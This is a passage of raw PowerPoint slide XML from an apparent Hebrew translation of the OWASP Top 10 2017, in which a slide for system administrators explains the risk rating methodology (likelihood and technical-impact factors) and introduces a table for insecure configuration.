              <a:rPr lang="en-US"/>
              <a:t>+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>מה הדבר הבא עבור מנהלי מערכות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1671261304"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2141730"/>
          <a:ext cx="6858000" cy="693077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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169815814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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400989604"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8153400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>זה נוגע לסיכונים אשר החולשות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> חושפות</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7817857">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שיטת מדידת הסיכון עבור עשרת הפגיעויות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מבוססת על </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. לכל אחת מהקטגוריות בעשרת הפגיעויות, אנו מעריכים את הסיכון האופייני אשר כל חולשה מכניסה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ליישום </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> טיפוסי ע"י התבוננות בגורמי הסבירות וגורמי ההשפעה עבור כל חולשה נפוצה. לאחר מכן אנו מדרגים את עשרת הפגיעויות בהתאם לחולשות אשר לרוב מייצרות את הסיכון המשמעותי לכל יישום. גורמים אלו מתעדכנים בכל מהדורה של מסמך ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ככל שדברים מתעדכנים ומתפתחים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מסמך ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מגדיר גורמים רבים על-מנת לסייע לחשב את הסיכון</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לכל חולשה שמתגלה.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אולם, מסמך עשרת הפגיעויות צריך לדבר בצורה כללית, ולא על חולשות פרטניות ביישומים אמתיים ובממשקי פיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>).</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כתוצאה מכך, לא נוכל להיות מדויקים כמו מנהלי מערכות בעת חישוב הסיכונים עבור היישומים שלהם.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הנך מצויד בכלים על-מנת לשפוט את החשיבות של היישומים והנתונים שלך, מהם הסיכונים שלך, וכיצד המערכת שלך בנויה ומתפקדת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השיטה שלנו כוללת שלושה גורמי סבירות עבור כל חולשה (שכיחות, יכולת גילוי, יכולת ניצול) וגורם השפעה אחד (השפעה טכנית). רמות הסיכון לכל גורם נעות בין 1 (נמוכה) ל-3 (גבוהה) עם מינוחים פרטניים לכל גורם. השכיחות של כל חולשה מהווה גורם אשר לרוב אינו נדרש לחישוב. עבור מידע שכיח, סיפקנו מידע סטטיסטי ממספר ארגוני (לסימוכין, ראה תודות בעמוד 24), וכן קיבצנו את המידע ביחד על-מנת להגיע לרשימה של עשרת הפגיעויות בעלות הסבירות הגבוהה ביותר, מסודרות לפי שכיחות. מידע זה אורגן ביחד עם שני גורמי הסבירות (יכולת גילוי ויכולת ניצול) על-מנת לחשב את מדרג הסבירות לכל חולשה. מדרג הסבירות הוכפל ע"י הערכות לגבי ממוצע ההשפעה הטכנית עבור כל פריט על-מנת להגיע לחישוב סיכון כולל לכל פריט ברשימת עשרת הפגיעויות (ככל שהתוצאה גבוהה יותר, הסיכון גבוה יותר). יכולת גילוי, יכולת ניצול, וההשפעה חושבו ע"י ניתוח חולשות אבטחה (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CVEs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) שדווחו, אשר היו קשורות לכל אחת מהקטגוריות ברשימת עשרת הפגיעויות.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הערה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: שיטה זו אינה לוקחת בחשבון את הסבירות של גורמי הסיכון. כמו-כן, לא נלקחים בחשבון נתונים טכניים שונים הקשורים עם היישום הספציפי של הארגון שלך. כל אחד מגורמים אלו עשוי להשפיע בצורה ניכרת על הסבירות הכוללת של התוקף למצוא ולנצל חולשה מסוימת. דירוג זה לא לוקח בחשבון את ההשפעה בפועל על הארגון שלך. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הארגון שלך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> צריך להחליט עם איזו רמה של סיכון אבטחתי הנובעים מהיישומים וממשקי הפיתוח (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>APIs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בארגון שלך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הוא מוכן לקבל בהתבסס על התרבות הארגונית, התעשייה, והסביבה הרגולטורית בה הוא פועל. המטרה של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אינה לבצע ניתוח סיכונים עבורך.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הטבלה הבאה ממחישה את החישוב שלנו לסיכון עבור</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A6:2017 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> - ניהול תצורה לא מאובטח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857343749"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="5775521"/>
          <a:ext cx="6629400" cy="2807260"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
